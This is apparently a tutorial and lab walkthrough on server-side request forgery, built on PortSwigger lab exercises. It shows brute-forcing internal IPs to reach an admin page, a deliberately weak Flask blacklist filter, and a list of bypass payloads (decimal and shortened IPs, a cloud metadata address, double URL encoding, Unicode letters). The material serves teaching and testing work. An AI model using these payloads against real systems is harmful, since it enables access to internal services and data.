II. Analyze and exploit Server-side request forgery vulnerabilities (continued)
3. SSRF vulnerability accessing other back-end system
Besides taking advantage of the SSRF vulnerability to access the local server, we can also access other back-end systems. These systems are usually not directly accessible from the public server, to attack these servers we need to know their exact domain or IP address. Brute force method can be used to search in the range of IP addresses suitable for the attack target.
Basic SSRF lab analysis against another back-end system
Description: The stock check function of the website retrieves data from the intranet and returns it to the user. Here contains SSRF vulnerability. Know that the intranet system has an admin page /admin in the range 192.168.0.X with port
8080 8080 . To solve the lab, we need to exploit the SSRF vulnerability to access this admin page and delete the carlos user account.
Similar to the previous lab, stockApi parameter passed by the POST method to the system value is a URL address and this address is only accessible from the local network.
Checked for SSRF vulnerability using DNS lookup technique and succeeded:
Notice the original address passed to the site’s system: http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1 has IP 192.168.0.1 , open port
8080 8080 , we already know there exists an admin page with the URL of the form 192.168.0.X:8080/admin . The idea is that we’re going to brute force all this IP’s ability to find the correct URL.
Send request to Intruder function
Place the payload marker at the location where the brute force attack is needed. This is an IPv4 address, so octet X has a value from
0 0 to
255 255 , that’s the same payload list we’re going to exhaust:
Observe that IP 192.168.0.139 returns status
200 200 and in the response contains the admin page function:
Finally visit this URL and delete the carlos user account. Payload: stockApi=http://192.168.0.139:8080/admin/delete?username=carlos
Labs solved:
4. SSRF and bypass blacklist-based input filters
The addresses commonly used to access the local network are usually in the form http://localhost or http://127.0.0.1 , so we can prevent these sensitive phrases with a black list – the list ” black” includes elements that are not allowed to appear. For example the following code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | <span class="token keyword">from</span> flask <span class="token keyword">import</span> <span class="token operator">*</span> <span class="token keyword">import</span> requests app <span class="token operator">=</span> Flask <span class="token punctuation">(</span> __name__ <span class="token punctuation">)</span> <span class="token decorator annotation punctuation">@app <span class="token punctuation">.</span> route</span> <span class="token punctuation">(</span> <span class="token string">'/ssrf'</span> <span class="token punctuation">)</span> <span class="token keyword">def</span> <span class="token function">follow_url</span> <span class="token punctuation">(</span> <span class="token punctuation">)</span> <span class="token punctuation">:</span> url <span class="token operator">=</span> request <span class="token punctuation">.</span> args <span class="token punctuation">.</span> get <span class="token punctuation">(</span> <span class="token string">'url'</span> <span class="token punctuation">,</span> <span class="token string">''</span> <span class="token punctuation">)</span> blacklist <span class="token operator">=</span> <span class="token punctuation">[</span> <span class="token string">'127.0.0.1'</span> <span class="token punctuation">,</span> <span class="token string">'localhost'</span> <span class="token punctuation">]</span> <span class="token keyword">for</span> check <span class="token keyword">in</span> blacklist <span class="token punctuation">:</span> <span class="token keyword">if</span> check <span class="token keyword">in</span> urk <span class="token punctuation">:</span> <span class="token keyword">return</span> <span class="token string">"Attack SSRF detected!"</span> <span class="token keyword">return</span> <span class="token punctuation">(</span> requests <span class="token punctuation">.</span> get <span class="token punctuation">(</span> url <span class="token punctuation">)</span> <span class="token punctuation">.</span> text <span class="token punctuation">)</span> <span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span> <span class="token punctuation">:</span> app <span class="token punctuation">.</span> run <span class="token punctuation">(</span> host <span class="token operator">=</span> <span class="token string">"0.0.0.0"</span> <span class="token punctuation">,</span> port <span class="token operator">=</span> <span class="token number">9999</span> <span class="token punctuation">)</span> |
The website checks whether the values 127.0.0.1 , localhost in the blacklist appear in the url parameter, thereby preventing SSRF attacks to the local server.
However, to access the local server, we have many ways to bypass this prevention mechanism.
- Bypass with domain redirection
1 2 3 4 5 6 | http://spoofed.burpcollaborator.net http://localtest.me http://customer1.app.localhost.my.company.127.0.0.1.nip.io http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost http://bugbounty.dod.network redirect to 127.0.0.2 == localhost |
- Bypass with decimal IP location
1 2 3 4 5 | http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1 http://2852039166/ = http://169.254.169.254 |
- Bypass with rare address
1 2 3 4 | http://0/ http://127.1 http://127.0.1 |
The system can also perform blocking of special keywords (eg admin keyword). We can bypass by the following:
- Bypass by URL encoding
1 2 3 | http://127.0.0.1/%61dmin http://127.0.0.1/%2561dmin |
- Bypass with special characters
1 2 3 4 5 6 | http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com // các ký tự đặc biệt: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ |
- Bypass using Unicode
There are many other bypass methods you can refer to at Payloads all the things .
Analysis of SSRF lab with blacklist-based input filter
Description: The stock check function of the website retrieves data from the intranet and returns it to the user. Here contains SSRF vulnerability. Know that the site has an SSRF prevention mechanism that includes two layers of checks. To solve the lab, we need to bypass this blocking mechanism, access the admin page at http://localhost/admin and delete the carlos user account.
Similar to previous labs, the stockApi parameter in the check stock function passes to the system a URL value via the POST method.
Check for SSRF vulnerability, perform DNS lookup successfully:
Checking the system’s blocking mechanism, we notice that the website uses a black list to block special keywords like localhost and 127.0.0.1 :
We can bypass this blocking step with rare address http://127.1 or http://127.0.1
Access to /admin is also prevented:
This second layer of containment also uses a black list for the admin keyword, bypass:
- Way
first first : Use uppercase characters, such asAdmin, payload:stockApi=http://127.0.1/Admin
- Way
2 2 : Encode URL, can do URL encode any character. Note the need to encode2 2 times due to the POST process already therefirst first time decode URL. Payload:stockApi=http://127.0.1/%25%36%31dmin
Delete the carlos user account and complete the lab:
References
- https://portswigger.net/web-security/ssrf
- https://en.wikipedia.org/wiki/IPv4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
- https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf